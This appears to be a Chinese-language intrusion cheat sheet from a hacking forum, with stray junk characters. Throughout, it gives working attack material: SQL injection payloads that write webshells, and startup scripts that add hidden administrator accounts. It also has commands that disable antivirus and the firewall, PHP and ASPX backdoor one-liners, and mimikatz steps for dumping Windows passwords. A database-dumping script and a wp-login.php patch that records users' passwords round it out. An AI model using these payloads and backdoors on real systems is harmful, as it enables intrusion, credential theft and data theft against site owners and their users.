SELECT password_hash FROM sys.sql_logins where name='sa'( G1 _. P# g4 z
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. X2 r0 m. |, p/ _; ^
access中导出shell
% f7 A* @9 ^; W( Q7 v; `
6 ?& W! b# o4 N W* g, u A. J中文版本操作系统中针对mysql添加用户完整代码:7 f# F7 s, h% x" `
6 a/ J, v% |1 @) _& K% X Z t. cuse test;
7 i! Q8 `: w" F; b/ f) s rcreate table a (cmd text);" R R8 e" ~" c
insert into a values ("set wshshell=createobject (""wscript.shell"") " );6 t9 l- C- Z, }4 w/ x% I
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& W+ N( K( q" P% J) M8 |* X5 vinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 o1 s+ k; J5 G
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
% N, b9 k+ E! ]* z2 T4 Fdrop table a;
% A. h9 J0 i$ A2 N+ T/ R
6 u+ z- V" |; |- n: I5 l2 y' Y英文版本: _( E+ c6 Z" Y1 C
8 Z5 O1 `# O+ t* r7 l$ suse test;; ?* c% `0 q3 ]4 G$ I
create table a (cmd text);6 \0 L: F0 f2 S" Q; P3 R
insert into a values ("set wshshell=createobject (""wscript.shell"") " );) p/ R6 Q3 F* J! h* B, y9 F8 E
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );, _' J1 T# u t( W" s
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );5 N: U% S' ]% k9 V# B; f6 V
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
! ^5 q0 A+ k+ R+ Gdrop table a;" d/ x9 m% J! _' t
" J/ u! C$ @; ^6 x2 G* G ~) g( y, U
create table a (cmd BLOB);1 z3 w. J1 F1 Q0 U4 ~* [% i
insert into a values (CONVERT(木马的16进制代码,CHAR));& s' ]- M X: G, n6 e! q7 c
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'' C9 F2 Y B; P) R& v
drop table a;, I4 l- j c9 P2 B8 E
# k! D9 K7 V1 }5 t
记录一下怎么处理变态诺顿$ ?5 @0 J4 l) N
查看诺顿服务的路径
8 R8 `$ [ _1 m) g0 v2 I! d9 y! {( \sc qc ccSetMgr
& q/ [# n% X& p, M, a* Y然后设置权限拒绝访问。做绝一点。。+ t G4 l" D+ q, p3 o) P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
! r2 z0 @7 l0 J7 b |2 {( P& gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"4 W/ [6 q! G2 U. ?' h, c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
8 p5 Q7 }/ k7 j# W2 Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
4 f: d( p* q& e7 C C5 Y- j3 I# N2 Z2 k9 V7 N
然后再重启服务器
! N, m8 D( z$ z9 p* z, viisreset /reboot
8 F Z) ^% Z i8 {3 @这样就搞定了。。不过完事后。记得恢复权限。。。。; A5 m, [' `( \1 R0 C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F w0 c ^! |/ T
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, b4 H- M# Y, B4 |, Y0 z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F6 K% m3 d+ p3 `, T9 R
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
2 {: a) r& }% W& N0 |1 B: ESELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
3 I6 X& G9 ?1 p
/ s T/ [6 T& b& D8 x' hEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') A9 @0 N& U, t3 [; e7 o4 V8 r
* o; H0 \! H8 h8 p# {1 F' r
postgresql注射的一些东西/ Q2 {% o* V( ^( L5 v* o- j, S
如何获得webshell
0 ~ f! K6 z$ y; _) khttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
! |$ c7 Z; _3 _$ s$ M4 t7 X) jhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
, u' A" i7 X6 v. d l: |2 Ihttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
: D/ C3 D4 |* D: `, e如何读文件
% c7 c. T; o% ?7 Hhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
$ S0 w$ R1 I0 Y0 P w) T4 [http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
1 O7 }$ G! ^6 _http://127.0.0.1/postgresql.php?id=1;select * from myfile;; `1 \, M% x* W$ c" |# t3 g7 e
6 ^2 a4 p7 ]: e) K! k2 g+ E, c
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。, I. _4 X1 j u. `" P, D5 `2 o
当然,这些的postgresql的数据库版本必须大于8.X. P* ] ^3 E9 Q/ t
创建一个system的函数:* {3 Q( P; O" N8 E1 S' c# m
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
) P# l! `- _" L/ \: D4 M; y; {# H2 L+ T' o- w
创建一个输出表:# V6 J3 I3 T$ z7 m0 f. F. _& @
CREATE TABLE stdout(id serial, system_out text)
2 S. }9 G8 U& A0 N
# @) g0 S, ^4 j; M执行shell,输出到输出表内:* l: _7 Y4 I3 L$ K* J* j1 O( F7 G
SELECT system('uname -a > /tmp/test')7 ^ q& N; W) l- W; h; j
8 l3 v* e: k1 J6 R$ p- Ccopy 输出的内容到表里面;, P* c! u+ A) P; w7 L. N
COPY stdout(system_out) FROM '/tmp/test'
4 n3 u1 R, V6 ~$ m6 A! _7 [6 P% H$ m* @3 s( T2 g! ~+ f; w
从输出表内读取执行后的回显,判断是否执行成功; }7 M9 o6 ?, e, g! C3 f) s) A
6 N$ {$ G# p$ \" RSELECT system_out FROM stdout
" U6 Q- J$ G/ R: y& r4 q下面是测试例子
! z" @2 r3 |3 f' t0 b% I' F/ Z
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
' V- M% Y$ N0 A# P$ T" @+ k7 i& L/ O0 i4 s1 y' w8 Q
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
- G/ D, r' o3 i' _# \% a1 LSTRICT --
- l; m, v! P3 R
$ D) X' k5 q5 x# d9 @, ]/store.php?id=1; SELECT system('uname -a > /tmp/test') --
% r4 p& U$ U" t( B2 [8 X
; F& F0 u- n% K% s/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --0 t7 E0 u$ ^1 `: S4 B- a0 v( \: o
/ Q+ B4 [% \! C$ w3 X& V/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--$ l. @# V- c7 n+ Q5 r# k1 `
net stop sharedaccess stop the default firewall( E$ \- X# B p7 }( r7 k
netsh firewall show show/config default firewall
5 p9 }4 [& o3 M. m+ ?# j5 @netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
~6 u3 k- v; Y; x; _# T, b) Anetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall5 M0 |4 k8 s( ^. R, E
修改3389端口方法(修改后不易被扫出)6 l, m6 \5 R Q' \8 B
修改服务器端的端口设置,注册表有2个地方需要修改
, \: ]' ^; Z, ]) A2 c9 h" a, c _4 ?; h7 O5 |/ v( i( A
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
1 B! H/ T! ^# b) @( U1 w9 x8 vPortNumber值,默认是3389,修改成所希望的端口,比如6000
) [$ e1 y0 E' t- h4 V4 |1 d3 [. w7 e3 X# Z: E' o
第二个地方:
) e* O0 A& [* I' M6 L7 s+ T g0 F[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 6 d' u9 T: f Q7 e4 f
PortNumber值,默认是3389,修改成所希望的端口,比如6000
; {* i6 s) U! X! p! `5 Q, J8 T) d& D }; f8 ]) y- R: j
现在这样就可以了。重启系统就可以了
0 i; n8 u& s$ D9 M4 r) O8 m8 P$ x3 m/ z" K
. g; c- o: y/ I$ h% u& L查看3389远程登录的脚本) b( U: g% R- E
保存为一个bat文件
; I7 P$ Y% F9 i' w" bdate /t >>D:\sec\TSlog\ts.log
; F( Z. D# {: {# y( }& u0 |& htime /t >>D:\sec\TSlog\ts.log! }' N, j* @* B# ]' [8 \! I! I* P6 S
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
& \# G# y7 M+ Z9 v% @start Explorer
# U, F; Y" C' ?& O+ x5 H1 @+ I3 g7 |: q5 I4 P I' ^
mstsc的参数:& \3 `( N9 T5 C8 s- I, E
, J7 N+ X6 H, z* p$ J远程桌面连接
% u" {: v9 Z x! ~& H
: H& D( U1 ~1 F& S8 G6 n+ MMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
3 S5 m* b- S- _5 d( y [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
9 ~# F9 @* X( L$ Y7 V- Z3 {- I- x
/ u2 ]- \8 O- C; u( R1 Z6 g<Connection File> -- 指定连接的 .rdp 文件的名称。: R6 \# y- z/ ~6 G
. G H$ k0 K2 v2 E6 y/v:<server[:port]> -- 指定要连接到的终端服务器。# S! f7 G# s+ I! \# f" ^* {' a6 |' A$ k8 O
& Q- G4 E9 d) r3 R! V/console -- 连接到服务器的控制台会话。+ X- C9 k6 R2 N2 B$ z- B3 Y
3 t! Q( q6 u1 O) [- U9 T/f -- 以全屏模式启动客户端。% w2 I$ M# Q; K, J+ M' B
7 C* o$ b/ R0 e( m& _5 v4 O/w:<width> -- 指定远程桌面屏幕的宽度。& H% J* u9 T. k O
( n% [- Y4 B$ U$ y
/h:<height> -- 指定远程桌面屏幕的高度。- ^3 e9 _! U& a1 J
( U; ^) _/ ?5 a% g, b( e4 O
/edit -- 打开指定的 .rdp 文件来编辑。, g1 L: {* ^$ C
4 `$ d$ J5 K8 Y$ Y5 k9 E8 i/migrate -- 将客户端连接管理器创建的旧版
0 ]4 b9 R+ U' a连接文件迁移到新的 .rdp 连接文件。
4 V0 }) q0 M+ ?$ v2 s* b2 ^2 Q# \$ z* R
7 f! W' f6 [5 W0 r+ l% w其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就! ]: Y5 p+ M6 y I
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量9 r( K1 }; w1 ?/ f) D4 P( [
' ? r+ ~$ [7 T" {命令行下开启3389
9 W) |( |5 r/ W0 A# U R% hnet user asp.net aspnet /add
$ u- d& C, [, m. g# G# n" g) ^net localgroup Administrators asp.net /add
# L: [, {0 L, H8 [net localgroup "Remote Desktop Users" asp.net /add
) Y. d/ p7 b/ D, f9 H" oattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D$ @3 T1 q# ]1 j4 D; k9 ~
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
6 n) c3 ? `1 n, Cecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
2 Y, ?% g, `, [% necho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f4 z% v; \' e& r) }
sc config rasman start= auto
8 u2 s/ p2 s2 \) n7 c: W7 A# @sc config remoteaccess start= auto( v& U( S. `1 K; s* c) T
net start rasman- U' P5 S: g0 w3 P l. O8 v
net start remoteaccess9 o1 L5 g% r6 v/ W% Q+ o) \3 T
Media. _6 u2 P) U# b6 [9 o9 E
<form id="frmUpload" enctype="multipart/form-data"
) d" U* j- N# x0 M8 l6 v8 b" M, haction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
) l3 F1 O9 j! K+ Q+ c<input type="file" name="NewFile" size="50"><br>
0 A) t" x# z) B) {<input id="btnUpload" type="submit" value="Upload">
. G" K4 r! F8 V0 k; V! v</form>/ J# R" Q# F9 l
. i! u8 r) a; V- s6 K9 S1 Z" k) Jcontrol userpasswords2 查看用户的密码3 M2 Q* S8 Y2 V5 m4 U4 [+ q
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径) R }% {+ z8 V9 R0 t) v
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. W7 f$ x- e5 ]9 [) W+ ^
k! y! b4 @1 p$ Y. K3 P/ V2 x' n
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
" e1 G( t: b ~6 T测试1:
& A" p( \) D3 FSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! C7 ] [3 C. j, K' f2 B6 h
! I8 K" n& |+ R( i5 w测试2:2 X# k- ^. u$ G1 Z/ S) T
, ~0 J0 M1 w* f# ?create table dirs(paths varchar(100),paths1 varchar(100), id int)
7 r6 `9 {0 Q8 v f: K( W1 `% o" S4 [0 {
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
; v" }) ^1 w! r
' L0 _/ S. [. gSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1+ v9 B; L3 F) }
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
* L: z3 o6 k9 e2 b2 X7 ]可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
) M$ Z7 f7 L- knet stop mcafeeframework
$ c0 K* `, }% w. l. W: {( ^& G! X; Y+ Gnet stop mcshield3 J( q9 G- r1 A! {' c
net stop mcafeeengineservice5 r: i- D" |9 G9 d2 M1 b' b
net stop mctaskmanager
* t% B3 I' c# W. l5 f6 K, Hhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
4 V$ }4 T- `5 Z! Q+ r; b
7 W) e7 i7 X9 o( e' I VNCDump.zip (4.76 KB, 下载次数: 1)
" c! G' `) x" I# H密码在线破解http://tools88.com/safe/vnc.php
+ h+ d5 W j' ] I. J; EVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
2 j$ o- E- k* Q' x7 @) ]2 z# c4 c. S5 v4 Z& c7 b. H+ P- j
exec master..xp_cmdshell 'net user'( M8 k- f6 P c% v% }
mssql执行命令。) _, J' b# }/ q; R( {# U
获取mssql的密码hash查询
, n( R* \7 M1 S( }0 z8 n8 k! h6 qselect name,password from master.dbo.sysxlogins* y6 H- ~! n$ }4 C$ ~4 e3 J/ G
+ W) t( k+ Y. J1 K7 i
backup log dbName with NO_LOG;! T7 Z, {: Q: @
backup log dbName with TRUNCATE_ONLY;( n' O. I: Y( @' ~! u* X/ D" B2 v
DBCC SHRINKDATABASE(dbName);2 E! F* s8 _, X8 r2 I7 i
mssql数据库压缩
5 Z# b& q/ }) [7 ]3 u2 a5 x3 f G& I7 {
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK- [* } A9 s* U. c+ f$ O$ x* {3 f. u
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。1 x4 q0 l, h4 p* B) L8 `" k
+ G3 o$ z( P. v0 D5 Mbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
( M& h* ^# B4 z6 T$ K备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
! J$ S3 `+ z: B- n% G# C3 }& J" e% H6 O( S0 w
Discuz!nt35渗透要点:9 i* V! s( B3 Z& o7 C0 W
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
3 B+ ]+ t6 E, ^' W# [- I(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
N" ^ T, i( V8 r3 U" X( [9 g$ t(3)保存。
' h% v% K; `8 c8 |(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass/ S" x2 W6 r: x% s0 p
d:\rar.exe a -r d:\1.rar d:\website\
" F! C' E9 ?' G- ?3 S' j5 `递归压缩website
4 p8 ?. \& \! `. o9 U/ Y* D注意rar.exe的路径3 P; y0 Z4 j8 o( U. I- ^
! ~7 E+ U; T0 i; n9 ^
<?php
9 p' f6 W( j+ i2 `3 o3 C, H; `7 B/ w1 z, X; |' Q6 C& d
$telok = "0${@eval($_POST[xxoo])}";( Q, g, o- I% ]
/ F+ o( a' ^ w$username = "123456";
, y7 E* S% v5 m' s$ @
8 o6 H* |8 |3 k3 v' b+ O$userpwd = "123456";
7 D# u% ~2 z o5 T8 V1 g- b$ I$ _- P6 R6 m
$telhao = "123456";$ R* i% G6 L2 U9 f8 i
5 M) [, U/ A; `6 t- \
$telinfo = "123456";
9 [5 s# j k( G% s. ]! `& y- S" y F
?>' Z2 ]+ U. h6 D N" \8 m
php一句话未过滤插入一句话木马
2 C$ ~$ K3 K1 D% X' }2 c7 R# ^ P ~
站库分离脱裤技巧
" {* P/ j! @+ Y5 d. g) Y* m2 bexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
_( [* O4 e2 Q) rexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
; r0 i* Y/ c4 s0 h3 b" ?! l, k条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
) j" s1 R+ y0 A0 G3 Z" ?这儿利用的是马儿的专家模式(自己写代码)。
7 M6 e6 K" D! W* u4 ], ]: ~$ Pini_set('display_errors', 1);
4 @6 J* w* P- Qset_time_limit(0);
2 z! |) n2 T% u; C- q3 i: c% Perror_reporting(E_ALL);' P" M) [) ?0 f! y, L- E
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
7 D5 i" X- X6 `/ c5 H1 emysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());# \' \9 G: v/ U% `) p
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());/ n* F/ F, M2 M* F: d" k3 j
$i = 0;! C) M P) L* G Q0 v
$tmp = '';
6 l# E# G) X- k% c+ U, Uwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
' J! g; y$ f- n6 o2 {# y4 f $i = $i+1;3 P& B8 `6 F: z# b, s6 O4 ?' J: G0 m
$tmp .= implode("::", $row)."\n";
" B9 \$ m1 D1 _2 F) V if(!($i%500)){//500条写入一个文件& \2 d: ?4 v! C _7 ?
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
- ~, d# y( I }$ _# i5 u0 o$ L file_put_contents($filename,$tmp);
$ {+ d4 L/ o9 E- n4 J& C/ A* f6 [4 ? $tmp = '';$ D3 t1 W3 ~3 y" T+ s ~9 _( y
}
4 ?/ @* @* i$ L) c* O: _3 q}
9 H2 p+ s" b+ [3 X* Lmysql_free_result($result);4 `4 U1 X8 H N$ ^$ X" I% B
, o1 R$ |! A8 Z7 p
1 ~- q& L7 @. j, V8 b4 _8 M8 w, {1 i. b1 ]; z6 u+ E4 T
//down完后delete. L! m. h$ m4 k& |7 m# B( } o% z
% D) Z3 V7 u: G$ u# ~. v# |' r0 o0 ^) y% w2 m
ini_set('display_errors', 1);
) F {) V- B+ l$ B, h3 gerror_reporting(E_ALL);
1 ~/ n5 N3 x) s6 u# E5 J$i = 0;; x, V$ i7 a) i4 }5 |
while($i<32) {, i+ y' {7 |4 u/ q; B
$i = $i+1;
! M) D4 J3 B9 m; d$ C $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';5 @; m7 Z' O9 r$ l. e% k9 E
unlink($filename);
9 |9 O9 j1 ]& `' Q; D3 \} 3 a' M- F4 T' [9 h9 F0 g$ G
httprint 收集操作系统指纹
" A' m: ~, |5 N) u扫描192.168.1.100的所有端口( @8 u9 _7 s5 v G9 ~# a
nmap –PN –sT –sV –p0-65535 192.168.1.100
. r2 u2 K ~4 t* y! ^5 qhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
! e# T* Z0 B7 R/ A6 Lhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
: H& h9 k% w: }+ I8 XNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
, s: \% O% o8 F1 e0 {* w. ~/ V$ c& g. \8 S8 [/ a- U0 s
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
/ x& Y9 |, F2 c: f8 v& S, x& ]0 b
( I- o0 [6 D" i7 C( s! ?6 u MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
0 N3 e7 ?+ A& v' |) J0 H0 j6 {3 y; B& ? V$ d7 E* |, f( k% _- b3 p: D3 P
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
/ g( i/ G7 p! z
% l4 G9 t& G1 b+ q+ f DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
0 t& K; \4 b+ t9 h* c6 z
/ L( `( U8 h! J4 c8 k http://net-square.com/msnpawn/index.shtml (要求安装); G- Y' W8 {: B! O _7 v/ A
2 C2 D# B/ [2 |2 t/ q# s tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)! G3 o; g( @3 Y$ {! H% b
/ N# ^- X# q2 B9 |0 E" E; c
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
& x! M& R! Z$ y! {+ Eset names gb2312
- v& A8 {3 p3 ]! Y* _6 i6 m1 L导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。( w' @. o2 ]% Z9 q. ^
" m7 }( A# A7 f% W0 bmysql 密码修改& m0 m) m$ |! Y' b+ E
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
$ ?! e4 F. ?, f- mupdate user set password=PASSWORD('antian365.com') where user='root';
: u9 b1 h4 v: t0 }9 mflush privileges;9 {4 r6 J/ U, A/ E0 S
高级的PHP一句话木马后门: E. b2 P+ \ b8 X5 _* R
2 i- H }2 ~8 [2 E, w
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀9 f, @; ~" D- U) F0 `% P+ Z
1 F9 W `! P9 V8 k# V0 J
1、
# q. l# s/ ?- ~5 x& b
4 {' e& t: h. P3 `& |$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";/ C. l0 E0 m( j6 m- y
% i' Z- E$ t. H) M7 L) R$hh("/[discuz]/e",$_POST['h'],"Access");
, p5 @6 U2 a5 h) r, ^+ Z6 ~& @. X8 Q9 F( u) t, @
//菜刀一句话4 r% Z' Z. _' @1 C, S' Y
0 Q# I4 y8 U# I f( q
2、, g9 p! }* Z% _8 M
; d6 w9 \. a( Q8 ?, Z0 p# q+ a$filename=$_GET['xbid'];3 _- {4 F2 S! i1 a/ X
6 Q# `, }: W8 Dinclude ($filename);1 R) e! M# T- o$ g# G
$ L$ Y, P$ w7 p. h8 ]: m: C3 v//危险的include函数,直接编译任何文件为php格式运行
5 V% D% b! Y* @9 p5 R/ Y& V F. P$ }7 S: O9 _+ U9 q, g K/ F, R: X6 A2 i: H T
3、
8 [9 a; T$ V s: a/ c+ a9 V6 `" D9 M P; \8 n0 E
$reg="c"."o"."p"."y";
) P' P# S. @0 } X# ~( s2 z2 q" L9 c0 c% A
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
" b/ {/ |/ o# l7 }' B/ l9 M# A8 v T( W* _0 t5 [: G
//重命名任何文件/ Y5 \( B' z- s7 `
( `9 z" P! K9 `) W6 i4、. O P, o- W8 f# V$ m
/ Z, R& b. m. Z. Z$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
: e" C) |/ M, c u
9 a- m/ F! h; j$gzid("/[discuz]/e",$_POST['h'],"Access");: W6 x' {4 A' m' l5 ~' x: t
/ S- A# ?8 `7 J; f: ]. M//菜刀一句话, [- ]9 d1 g6 j3 O% O
" W4 p$ W- N* Z* y) @! r5、include ($uid);
1 x8 _! \* j" m1 x& }* t5 e# |4 }: C( K# X8 z* C& X& w+ J
//危险的include函数,直接编译任何文件为php格式运行,POST
% t9 x$ J% z* d9 E; H G7 b' b' `( R0 I, C" Q% t' K
~. u* ~0 a, O5 {//gif插一句话+ Q& m4 ^4 ^! v$ p U. V: G
6 H2 R6 Z- `, x/ w9 v8 A
6、典型一句话
! F7 c8 R: M. F+ n* f8 ^5 n4 ^* }% m x2 v
程序后门代码
B8 Y- U& E- O$ ^- `<?php eval_r($_POST[sb])?>
. E6 P* K- N6 E! d% g程序代码
3 d& L: D1 X/ w* u: h* Z<?php @eval_r($_POST[sb])?>8 D9 e( A) O& p
//容错代码' a# k, z3 _ _
程序代码
% P( i/ V5 {3 |/ u; C$ a3 b& P- |, L<?php assert($_POST[sb]);?>7 V4 N/ H& `4 p1 j/ S3 J! _" v
//使用lanker一句话客户端的专家模式执行相关的php语句
1 v' i3 r# C& o$ u程序代码
' [' p$ S2 @& ]. W! S8 V<?$_POST['sa']($_POST['sb']);?>
- C, t; g. n% a3 j2 e) H" Z程序代码* b" h/ W2 o1 X: W
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>0 S+ u5 [2 Z I5 x
程序代码' p* k" Q% b& y2 C
<?php
$ c5 C! `6 e) Y& j3 K9 U, D t@preg_replace("/[email]/e",$_POST['h'],"error");
4 ]8 d! s4 M1 @?>
, Y; g, @" \- L7 b4 ?4 U& _" R# M//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
8 ]& C5 @7 @3 Y1 c$ }! O: i/ D程序代码
8 S2 {. s! q- |! |<O>h=@eval_r($_POST[c]);</O> x1 z7 R: R( O1 r
程序代码
. L6 ?, j9 f6 X+ T9 k0 q4 w; M' ~8 @<script language="php">@eval_r($_POST[sb])</script>* ]; }9 ?3 e7 [- ^/ {
//绕过<?限制的一句话1 i' M% ]8 R5 w1 ^- M) V: V3 L
. A: k5 V* \" E6 B( E* [http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip5 P# b, |, S' S$ i( `
详细用法:
# }- R( i0 J/ Q1 L9 E1、到tools目录。psexec \\127.0.0.1 cmd K' B& f0 H5 s, e' H1 K4 M6 I
2、执行mimikatz
, u# J p. l( g3、执行 privilege::debug6 z' }# P2 | [ F. l
4、执行 inject::process lsass.exe sekurlsa.dll9 `9 a4 N; H8 g/ p7 d# q |0 q
5、执行@getLogonPasswords. e& [' q' z) M# ]' f6 E
6、widget就是密码
8 ~* y; `/ J" Z- B& Y7、exit退出,不要直接关闭否则系统会崩溃。+ R& D. A( P: m @& s1 A
! p# i; a5 r3 @2 h, J
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面! a' x; K, Q" a9 {: R
, S* j$ f$ u8 ?) {2 Y) y& b3 [- T自动查找系统高危补丁! Q9 j( L1 P4 U. F. F
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
# ]: u( n* r& j5 U- d' g9 Q/ }/ p" d4 H: j
突破安全狗的一句话aspx后门. T9 ]! l9 ]3 }/ _
<%@ Page Language="C#" ValidateRequest="false" %>5 |! h' O! G" m0 X' R$ i
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>" Q& u% L# h5 e5 K
webshell下记录WordPress登陆密码
+ ^. T5 [- L1 t0 W/ w6 hwebshell下记录Wordpress登陆密码方便进一步社工: u4 U7 a$ z1 s
在文件wp-login.php中539行处添加:0 Z5 L; @$ e2 ~ \* D# X* I
// log password
1 e0 E0 o4 } t P9 u' \$log_user=$_POST['log'];
+ B2 u: k& u0 ?5 x! @$log_pwd=$_POST['pwd'];
3 w% E3 _) L) k- C$log_ip=$_SERVER["REMOTE_ADDR"];% G) [' i6 C0 ]' x3 Y
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;* o* r6 x6 \) J
$txt=$txt.”\r\n”;8 y- Q$ F: ^ {
if($log_user&&$log_pwd&&$log_ip){
% r0 z) ]* w% R@fwrite(fopen(‘pwd.txt’,”a+”),$txt);; L: I( E- W/ a7 q9 C; I
